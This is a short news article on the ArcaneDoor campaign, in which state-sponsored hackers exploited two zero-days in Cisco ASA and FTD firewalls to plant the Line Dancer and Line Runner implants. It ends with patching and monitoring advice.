HQ/EMEAFind out how we can help your business
State-sponsored hackers are making use of two previously undiscovered vulnerabilities in Cisco’s Firepower Threat Defense (FTD) and Adaptive Security Appliance (ASA) firewalls as part of a recent cyber-espionage effort known as ArcaneDoor, which has sparked concerns throughout the world.
These zero-day vulnerabilities, known as CVE-2024-20353 and CVE-2024-20359, have been actively targeted since November 2023, according to a warning sent by Cisco.
The ArcaneDoor hacking gang, also known as UAT4356 or STORM-1849, initiated a comprehensive operation to compromise weak edge devices, demonstrating a deep understanding of the targeted systems. Even though the precise first attack vector is still unknown, Cisco found and fixed the security holes that the threat actors were using.
ArcaneDoor utilised ASA and FTD vulnerabilities to deploy malware, evading detection.
The ArcaneDoor hackers were able to infect hacked ASA and FTD devices with malware, such as Line Dancer and Line Runner, thanks to these weaknesses. Line Dancing was an in-memory shellcode loader that made it easier to execute shellcode payloads of any kind, turn off logging, grant remote access, and exfiltrate packets that were recorded. Simultaneously, a persistent backdoor known as Line Runner enabled the execution of any Lua code on compromised devices and managed to avoid discovery by using several defence evasion techniques.
UK’s National Cyber Security Centre (NCSC), the Canadian Centre for Cyber Security (Cyber Centre), and the Australian Cyber Security Centre of the Australian Signals Directorate jointly released an advisory detailing the extent of the hackers’ access within infiltrated networks. The malicious actors were able to carry out harmful activities, such as espionage and network traffic capture/exfiltration, by manipulating device configurations, controlling syslog services, and altering authentication settings.
In response, Cisco issued security upgrades to address the zero-day vulnerabilities and advised all users to update their equipment as soon as possible to lessen the chance of more attacks. Administrators were instructed to make sure robust authentication procedures were in place and to keep an eye on system logs for any indications of unauthorised activity.
This most recent event is another in a string of alerts about cybersecurity risks that affect networking devices. Large-scale brute-force assaults against VPN and SSH services, as well as advice on preventing password-spraying attacks against Remote Access VPN services, were among the previous alerts.
Proactive steps like regular software updates, attentive monitoring, and strong authentication procedures are essential for organisations to protect their networks from malevolent actors as cyber threats keep evolving.
